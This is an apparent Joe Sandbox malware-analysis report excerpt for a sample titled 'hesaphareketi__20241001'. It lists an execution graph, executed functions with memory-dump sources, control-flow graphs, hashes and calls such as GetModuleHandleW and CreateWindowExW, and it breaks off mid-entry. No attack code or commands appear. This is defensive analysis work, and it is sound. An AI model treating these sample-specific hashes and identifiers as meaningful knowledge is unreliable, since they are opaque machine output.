                                        execution_graph 35485 2c50848 35486 2c5084e 35485->35486 35487 2c5091b 35486->35487 35489 2c5133f 35486->35489 35491 2c51343 35489->35491 35490 2c51448 35490->35486 35491->35490 35494 626cfb8 35491->35494 35498 626cf98 35491->35498 35495 626cfca 35494->35495 35497 626d041 35495->35497 35502 626cd04 35495->35502 35497->35491 35499 626cf9d 35498->35499 35500 626cd04 4 API calls 35499->35500 35501 626cf5f 35499->35501 35500->35501 35501->35491 35503 626cd0f 35502->35503 35507 626e163 35503->35507 35516 626e178 35503->35516 35504 626d222 35504->35497 35508 626e1a3 35507->35508 35525 626e700 35508->35525 35530 626e6fa 35508->35530 35509 626e226 35510 626d4ec GetModuleHandleW 35509->35510 35512 626e252 35509->35512 35511 626e296 35510->35511 35513 626fc07 CreateWindowExW 35511->35513 35513->35512 35517 626e1a3 35516->35517 35523 626e700 3 API calls 35517->35523 35524 626e6fa 3 API calls 35517->35524 35518 626e226 35519 626e252 35518->35519 35520 626d4ec GetModuleHandleW 35518->35520 35519->35519 35521 626e296 35520->35521 35565 626fc07 35521->35565 35523->35518 35524->35518 35526 626e72d 35525->35526 35527 626e7ae 35526->35527 35535 626e862 35526->35535 35548 626e870 35526->35548 35531 626e72d 35530->35531 35532 626e7ae 35531->35532 35533 626e862 2 API calls 35531->35533 35534 626e870 2 API calls 35531->35534 35533->35532 35534->35532 35536 626e885 35535->35536 35537 626d4ec GetModuleHandleW 35536->35537 35538 626e8a9 35536->35538 35537->35538 35547 626ea74 35538->35547 35561 626d4ec 35538->35561 35540 626eacf 35540->35527 35541 626e9fa 35541->35540 35544 626d4ec GetModuleHandleW 35541->35544 35541->35547 35542 626ebf8 GetModuleHandleW 35543 626ec25 35542->35543 35543->35527 35545 626ea48 35544->35545 35546 626d4ec GetModuleHandleW 35545->35546 35545->35547 35546->35547 35547->35540 35547->35542 35549 626e885 35548->35549 35550 626d4ec GetModuleHandleW 35549->35550 35551 626e8a9 35549->35551 35550->35551 35552 626d4ec GetModuleHandleW 35551->35552 35560 626ea74 35551->35560 35554 626e9fa 35552->35554 35553 626eacf 35553->35527 35554->35553 35557 626d4ec GetModuleHandleW 35554->35557 35554->35560 35555 626ebf8 GetModuleHandleW 35556 626ec25 35555->35556 35556->35527 35558 626ea48 35557->35558 35559 626d4ec GetModuleHandleW 35558->35559 35558->35560 35559->35560 35560->35553 35560->35555 35562 626ebb0 GetModuleHandleW 35561->35562 35564 626ec25 35562->35564 35564->35541 35566 626fc0e 35565->35566 35567 626fc46 CreateWindowExW 35565->35567 35566->35519 35569 626fd7c 35567->35569

                                        Executed Functions

                                        Function 02C5CF20 Relevance: 3.6, Strings: 1, Instructions: 2308COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,btq
                                        • API String ID: 0-3970051468
                                        • Opcode ID: 8c25a7798173bc0ad277897ae41e780e5cd6f63682b3376263f2002a30166b19
                                        • Instruction ID: 42129ff4f7a5a50d542e7a00f64f27912e7eb95ff0d9cbca01cfeeb2e7ff8a0c
                                        • Opcode Fuzzy Hash: 8c25a7798173bc0ad277897ae41e780e5cd6f63682b3376263f2002a30166b19
                                        • Instruction Fuzzy Hash: 0E331E31D107198ECB15EF68C8906ADF7B1FF99300F15D69AE449A7221EB70EAC5CB81
                                        Function 02C59BB0 Relevance: 2.8, Instructions: 2834COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbd1ed7309b4517f3594b8e583c52cedfc0f78e0abd4c487e93a8378ec9bbd34
                                        • Instruction ID: ff6b9aa28e5c48fb3753960332a4b657deaef12d128ab076db1fbda39a4d0960
                                        • Opcode Fuzzy Hash: fbd1ed7309b4517f3594b8e583c52cedfc0f78e0abd4c487e93a8378ec9bbd34
                                        • Instruction Fuzzy Hash: 6163E631D10B1A8ECB11EB68C8946A9F7B1FF99300F15D79AE45877121EB70AAD4CF81
                                        Function 02C593F8 Relevance: .6, Instructions: 623COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f495b631f7434373394ce147947104fe28f0356c68d446e9c96de17b8f378e77
                                        • Instruction ID: f9ff9dbca255ee79c2b4adc8a6c6c5f31cedc0f4558189a7840aeb41dc937fb8
                                        • Opcode Fuzzy Hash: f495b631f7434373394ce147947104fe28f0356c68d446e9c96de17b8f378e77
                                        • Instruction Fuzzy Hash: D2329D35A00215CFDB14DF68D984BADBBB6EF88310F1484A5E90ADB395DB34ED81CB91
                                        Function 02C54A60 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ebaec79f6634547ab89ef795d139e5b412f12b7fc5d3be85aaf6247da7d89fe
                                        • Instruction ID: 2b0b08c0163facbc65180744ece2c34c3460bf31734cb48b420fbb38597cba2e
                                        • Opcode Fuzzy Hash: 7ebaec79f6634547ab89ef795d139e5b412f12b7fc5d3be85aaf6247da7d89fe
                                        • Instruction Fuzzy Hash: 59B18D70E00619CFDB28CFA9C9817ADBBF2AF88314F148529D815E7254EB74D9C1CB99
                                        Function 02C53E48 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c978d5828849ba24f21c3531ec486259dd11d3350d9e185c031a6317dfaa3bc
                                        • Instruction ID: c74d3327dd1a237e4411a18285c4e64fea5ebf168070d78aa51d157c6167791f
                                        • Opcode Fuzzy Hash: 3c978d5828849ba24f21c3531ec486259dd11d3350d9e185c031a6317dfaa3bc
                                        • Instruction Fuzzy Hash: AD918070E00259DFDF24CFA9C98579DBBF2AF88304F248129E805A7254DB74D9C5CB85
                                        Function 02C56EA2 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1991 2c56ea2-2c56f0a call 2c56c08 2000 2c56f26-2c56f55 1991->2000 2001 2c56f0c-2c56f25 call 2c5634c 1991->2001 2007 2c56f57-2c56f5a 2000->2007 2008 2c56f96-2c56f99 2007->2008 2009 2c56f5c-2c56f91 2007->2009 2010 2c56fad-2c56fb0 2008->2010 2011 2c56f9b-2c56fa2 2008->2011 2009->2008 2012 2c56fe3-2c56fe6 2010->2012 2013 2c56fb2-2c56fc6 2010->2013 2014 2c57168-2c5716f 2011->2014 2015 2c56fa8 2011->2015 2016 2c56ff6-2c56ff8 2012->2016 2017 2c56fe8 call 2c57978 2012->2017 2021 2c56fcc 2013->2021 2022 2c56fc8-2c56fca 2013->2022 2015->2010 2019 2c56fff-2c57002 2016->2019 2020 2c56ffa 2016->2020 2023 2c56fee-2c56ff1 2017->2023 2019->2007 2024 2c57008-2c57017 2019->2024 2020->2019 2025 2c56fcf-2c56fde 2021->2025 2022->2025 2023->2016 2027 2c57041-2c57057 2024->2027 2028 2c57019-2c5703f 2024->2028 2025->2012 2027->2014 2028->2027
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q$LR]q
                                        • API String ID: 0-3917262905
                                        • Opcode ID: 8a6d15a51cb5ce04a08c8e49bfb56cefae631a8a343320310232cab201c656d7
                                        • Instruction ID: 4189b3556209a6b3bbea2eb1978fb2ab92743e4dd748a71c7349789835f85aa1
                                        • Opcode Fuzzy Hash: 8a6d15a51cb5ce04a08c8e49bfb56cefae631a8a343320310232cab201c656d7
                                        • Instruction Fuzzy Hash: 4F411431E102199FDB15DBB9C8547AEBBB6EFC5300F208529E805EB380EB75D886CB55
                                        Function 0626E870 Relevance: 1.8, APIs: 1, Instructions: 301COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2408 626e870-626e896 2411 626e8c6-626e8ce 2408->2411 2412 626e898-626e8c0 call 626d4ec call 626d54c 2408->2412 2414 626e914-626e95d call 626d564 2411->2414 2415 626e8d0-626e8d5 call 626d558 2411->2415 2412->2411 2424 626eadb-626eb01 2412->2424 2436 626e963-626e9ae 2414->2436 2437 626eb08-626eb3a 2414->2437 2418 626e8da-626e90f 2415->2418 2428 626e9b1-626ea0a call 626d4ec call 626d570 2418->2428 2424->2437 2456 626ea0f-626ea13 2428->2456 2436->2428 2452 626eb41-626eb7f 2437->2452 2465 626eb81 2452->2465 2458 626eacf-626eada 2456->2458 2459 626ea19-626ea26 2456->2459 2463 626ea2c-626ea59 call 626d4ec call 626d564 2459->2463 2464 626eacb-626eacd 2459->2464 2463->2464 2480 626ea5b-626ea68 2463->2480 2464->2452 2464->2458 2466 626eba7-626ebac 2465->2466 2467 626eb83-626eba5 2465->2467 2466->2465 2469 626ebae-626ebf0 2466->2469 2467->2466 2471 626ebf2-626ebf5 2469->2471 2472 626ebf8-626ec23 GetModuleHandleW 2469->2472 2471->2472 2473 626ec25-626ec2b 2472->2473 2474 626ec2c-626ec40 2472->2474 2473->2474 2480->2464 2481 626ea6a-626ea81 call 626d4ec call 626d57c 2480->2481 2486 626ea83-626ea8c call 626d570 2481->2486 2487 626ea8e-626eabd call 626d570 2481->2487 2486->2464 2487->2464 2495 626eabf-626eac9 2487->2495 2495->2464 2495->2487
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a2fd9743916ad0f6424ebe0ab1505ac5c3c27cda9accaa1ba5a9e4277be25c7e
                                        • Instruction ID: 613e85a9050d2f72509d5caa9e76e2cd97ac22fe05882073b4577d0a477a1bf0
                                        • Opcode Fuzzy Hash: a2fd9743916ad0f6424ebe0ab1505ac5c3c27cda9accaa1ba5a9e4277be25c7e
                                        • Instruction Fuzzy Hash: 54B1A970A103058FCB54EF7AD88096EBBF6FF88310B148A69E846DB355DB74E845CB94
                                        Function 0626FC07 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2497 626fc07-626fc0c 2498 626fc46-626fcbe 2497->2498 2499 626fc0e-626fc38 call 626d5fc 2497->2499 2501 626fcc0-626fcc6 2498->2501 2502 626fcc9-626fcd0 2498->2502 2503 626fc3d-626fc3e 2499->2503 2501->2502 2504 626fcd2-626fcd8 2502->2504 2505 626fcdb-626fd7a CreateWindowExW 2502->2505 2504->2505 2507 626fd83-626fdbb 2505->2507 2508 626fd7c-626fd82 2505->2508 2512 626fdbd-626fdc0 2507->2512 2513 626fdc8 2507->2513 2508->2507 2512->2513 2514 626fdc9 2513->2514 2514->2514
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0626FD6A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 5f265831cd37f3098046b2ec7b65b7798a142213616a01a6ace99f47bfad9b23
                                        • Instruction ID: 10ce82ba22dd583e7817f65212de0b2ce1ddd45b3295cd279f148b08665a0bb4
                                        • Opcode Fuzzy Hash: 5f265831cd37f3098046b2ec7b65b7798a142213616a01a6ace99f47bfad9b23
                                        • Instruction Fuzzy Hash: DA51E2B1C10209AFCF15CF9AD984ADDBFB2FF48310F24815AE918AB220D7759881CF50
                                        Function 0626FC58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2515 626fc58-626fcbe 2516 626fcc0-626fcc6 2515->2516 2517 626fcc9-626fcd0 2515->2517 2516->2517 2518 626fcd2-626fcd8 2517->2518 2519 626fcdb-626fd13 2517->2519 2518->2519 2520 626fd1b-626fd7a CreateWindowExW 2519->2520 2521 626fd83-626fdbb 2520->2521 2522 626fd7c-626fd82 2520->2522 2526 626fdbd-626fdc0 2521->2526 2527 626fdc8 2521->2527 2522->2521 2526->2527 2528 626fdc9 2527->2528 2528->2528
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0626FD6A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 728cbe0c6407137f471f9b112e4cccda183de0e55ca11c8d74dae66368f5a78b
                                        • Instruction ID: 42d43102819d1627b61daf095e21711c98cbf770f6198907a9529178e3d1a7b6
                                        • Opcode Fuzzy Hash: 728cbe0c6407137f471f9b112e4cccda183de0e55ca11c8d74dae66368f5a78b
                                        • Instruction Fuzzy Hash: 3641B3B1D10309DFDF14CF9AD984ADDBBB5BF48310F24812AE819AB250D775A885CF90
                                        Function 0626EB80 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2529 626eb80 2530 626eb81 2529->2530 2531 626eba7-626ebac 2530->2531 2532 626eb83-626eba5 2530->2532 2531->2530 2533 626ebae-626ebf0 2531->2533 2532->2531 2534 626ebf2-626ebf5 2533->2534 2535 626ebf8-626ec23 GetModuleHandleW 2533->2535 2534->2535 2536 626ec25-626ec2b 2535->2536 2537 626ec2c-626ec40 2535->2537 2536->2537
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0626EC16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 084c3420b34067904b8b8026241dc09b0929a21d06781c33181e0d7d2042b416
                                        • Instruction ID: 4c19ffa5106a5b9cda2e4680510c16de63c838cda816e105751e83d359666adb
                                        • Opcode Fuzzy Hash: 084c3420b34067904b8b8026241dc09b0929a21d06781c33181e0d7d2042b416
                                        • Instruction Fuzzy Hash: 952190B5C193848FCB11CFAAC8406DEBFF4EF4A310F15849AD495A7251C3785549CFA1
                                        Function 0626D4EC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2539 626d4ec-626ebf0 2541 626ebf2-626ebf5 2539->2541 2542 626ebf8-626ec23 GetModuleHandleW 2539->2542 2541->2542 2543 626ec25-626ec2b 2542->2543 2544 626ec2c-626ec40 2542->2544 2543->2544
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0626EC16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4615374310.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6260000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 2f4aae60a45b23937e9dbddc1aa3182a1a35f0f3dc2475c6c017a310b4958e4c
                                        • Instruction ID: e236810c1934b502219d9f7909469325e3cef993cd4f6636b9536f1153d0a030
                                        • Opcode Fuzzy Hash: 2f4aae60a45b23937e9dbddc1aa3182a1a35f0f3dc2475c6c017a310b4958e4c
                                        • Instruction Fuzzy Hash: 1B1120B5C043498FDB10DF9AC544A9EFBF4EB48310F10845AE859B7200D378A585CFA5
                                        Function 02C5F465 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: 13b4db948388ea0fa4eee30fffd9a681ebd8e385d78ad56fd6c7f7c3aa89dec4
                                        • Instruction ID: f2e25b0df9e91dbe08924e72c6a0c94f42868bb295bb3a9b3d5468eb8551564e
                                        • Opcode Fuzzy Hash: 13b4db948388ea0fa4eee30fffd9a681ebd8e385d78ad56fd6c7f7c3aa89dec4
                                        • Instruction Fuzzy Hash: FA31D031B002118FDB199F74D66466E3BA3AF8A240F64886DD806EB385DF34DD86CB95
                                        Function 02C5F478 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: ff14f1ddbb74083b1ceb6b55d35ff182b4af54022dbb2ef20c953adcdab943fb
                                        • Instruction ID: 45c072fd1c9387c4da49d87c2b598f41f4eb612dd19335f5b933f0d40a7f53c5
                                        • Opcode Fuzzy Hash: ff14f1ddbb74083b1ceb6b55d35ff182b4af54022dbb2ef20c953adcdab943fb
                                        • Instruction Fuzzy Hash: 6831BD31B002118BDB19AF34955466E3BA7AF86200B60886DD806EB384DF34DD86CB95
                                        Function 02C56F40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: c2fe40809a65ec2c0c29a46785197257c38937dcb943958239f9ce7af8fae330
                                        • Instruction ID: 973e01d014a5b1349e9a447c757bdccf2d21f0ed9af7be5687a61f22dc79349d
                                        • Opcode Fuzzy Hash: c2fe40809a65ec2c0c29a46785197257c38937dcb943958239f9ce7af8fae330
                                        • Instruction Fuzzy Hash: 49318131E102199BEB24CFA5C84079EF7B6EF85314F608529E806EB240EB71D986CB55
                                        Function 02C56B68 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: 9e7f200f77eb73daae55824ad759ff3334f9c747c7f5db55f23825eea635a496
                                        • Instruction ID: a831fab8f3d93226ea178845e0bbc26426fa3ac44d7e8fb756d0000692ceccd1
                                        • Opcode Fuzzy Hash: 9e7f200f77eb73daae55824ad759ff3334f9c747c7f5db55f23825eea635a496
                                        • Instruction Fuzzy Hash: D221AA326182004FC702AB79C42035E7BF6EF86324F6049AED055C7392DE39D846C7E9
                                        Function 02C57978 Relevance: .6, Instructions: 560COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1eb5ddefa7d95ec0c6cafbb5e4cd51430a20f43aa652bd44291235fd21126f43
                                        • Instruction ID: d952716d40e613e80ae02ffffd3e6da1e1086bb5bbda6fe7897034e582f3e2b7
                                        • Opcode Fuzzy Hash: 1eb5ddefa7d95ec0c6cafbb5e4cd51430a20f43aa652bd44291235fd21126f43
                                        • Instruction Fuzzy Hash: BA129D31B002058BCB19AB38F68862976A7FFD5314B20897DE415CB3A4DF75DC8ACB95
                                        Function 02C54A56 Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7cbabb0e1f13d4df080319a8871cc0e830663dbf685efc55a60d1b936397d3d
                                        • Instruction ID: eb5cd3d926d205f2a9841802a0066c19b7b202e7d591ef75d5258e5a9c132992
                                        • Opcode Fuzzy Hash: e7cbabb0e1f13d4df080319a8871cc0e830663dbf685efc55a60d1b936397d3d
                                        • Instruction Fuzzy Hash: ECA19E70E00619CFDB24CFA9D98179DBBF1AF88314F148129D815A7254EB74D9C1CF99
                                        Function 02C593E4 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3691fb1f38a572f91ae1df641a7ec5c14e46c2da93ad09e4a41d47a6c46fdc42
                                        • Instruction ID: 579af73bb1eeb21dffe74e46f762699afc82210c018ff602da2143acf551945c
                                        • Opcode Fuzzy Hash: 3691fb1f38a572f91ae1df641a7ec5c14e46c2da93ad09e4a41d47a6c46fdc42
                                        • Instruction Fuzzy Hash: A8914735A00114DFCB14DF68D584AADBBF6EF88310F2484A9E906A7364DB30ED86CB95
                                        Function 02C53E3E Relevance: .2, Instructions: 233COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cb2921cd76c89f9b5ba137330869325c052cad5babcfa63f7a1ffabdfb3996a
                                        • Instruction ID: 9d40c00286dc6db7255e1d917e7a911feae556b86db88dd7ae1515c36ad38585
                                        • Opcode Fuzzy Hash: 5cb2921cd76c89f9b5ba137330869325c052cad5babcfa63f7a1ffabdfb3996a
                                        • Instruction Fuzzy Hash: 83917F70E00259DFDF24CFA9C94579DBBF1AF88304F248129E809A7254DB74D9C5CB85
                                        Function 02C547D8 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4ed2cebca23b839141104fc43302b11730d1128c6db74204e8af2569d5d55f8
                                        • Instruction ID: 368bbb4503740df8f5e0281e3aa826ca5a7dbb5dd28936bc239207138a3f355f
                                        • Opcode Fuzzy Hash: f4ed2cebca23b839141104fc43302b11730d1128c6db74204e8af2569d5d55f8
                                        • Instruction Fuzzy Hash: E1718CB0E00259DFDF28CFA9C84179EBBF6BF88314F148029E804A7254DB7499C1CB95
                                        Function 02C547CC Relevance: .2, Instructions: 178COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd82995ba9f8df34da174ec4b79a487dd46c5a064d491718a23bb8c08e22ae9a
                                        • Instruction ID: 8dc60223f5fc51486a9ec9cdcaeeb86d9c2f8d58de6071ef92f8e395d68f111c
                                        • Opcode Fuzzy Hash: cd82995ba9f8df34da174ec4b79a487dd46c5a064d491718a23bb8c08e22ae9a
                                        • Instruction Fuzzy Hash: FC716BB0E00259DFDF24CFA9C94579EBBF5BF88314F148129E808A7254DB7499C1CB99
                                        Function 02C56CA4 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e918b6dae5189236e1936d0e81b70ccb433c4bef6519d5ee4e61d83136d800bb
                                        • Instruction ID: 7fcb7876635b4b5d527e731ade4312fe7447ed53c25dee0f38928c11d8d53d3a
                                        • Opcode Fuzzy Hash: e918b6dae5189236e1936d0e81b70ccb433c4bef6519d5ee4e61d83136d800bb
                                        • Instruction Fuzzy Hash: 7A5155B0D002288FDB14CFA9C84579DBBF5FF48314F64842AE819AB390D7789880CF99
                                        Function 02C56CB0 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a17414da1b22223e446f28ad27acfaead76c963f4789fc8bcb6d992faa8d9b3e
                                        • Instruction ID: da079975184573d43cfb225d4a79a3c25ebd9ea3fb3f1311c2543c6dec1892bc
                                        • Opcode Fuzzy Hash: a17414da1b22223e446f28ad27acfaead76c963f4789fc8bcb6d992faa8d9b3e
                                        • Instruction Fuzzy Hash: 34512470D002288FDB14CFAAC844B9DFBB5BF48314F648519E819AB350D774A985CF99
                                        Function 02C5112A Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 906e633254ef458f36419eca73e3a80ef465cfb1c4fb3bbef7fb34843eea49f3
